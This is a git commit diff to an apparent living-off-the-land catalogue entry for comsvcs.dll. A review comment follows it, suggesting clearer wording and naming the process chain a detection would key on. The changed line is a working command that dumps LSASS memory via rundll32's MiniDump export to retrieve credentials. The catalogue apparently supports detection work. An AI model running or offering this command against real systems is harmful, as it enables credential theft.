Addressing @bohops's feedback

Wietze
2022-05-05 11:12:22 +01:00
parent 085aaa37b1
commit b92ee99627
11 changed files with 25 additions and 45 deletions

@@ -4,7 +4,7 @@ Description: COM+ Services
Author:
Created: 2019-08-30
Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
- Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump
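
Review bot: The Description line is not updated to match the new Command line, which now launches rundll32 through `powershell /c` and drops the quotes around `[LSASS_PID] dump.bin full`. The Description still only covers the comsvcs.dll export, so a reader cannot tell whether the PowerShell wrapper is a requirement or just one way to run the command. Suggest adding a sentence to the Description giving the reason for the wrapper, and stating that the resulting process chain is powershell.exe spawning rundll32.exe, since that is what a detection written from this entry would key on. Spelling the switch out as `-Command` instead of `/c` would also read more clearly. Two smaller points in the context lines: "which in turns calls" should read "which in turn calls", and `Author:` is left empty.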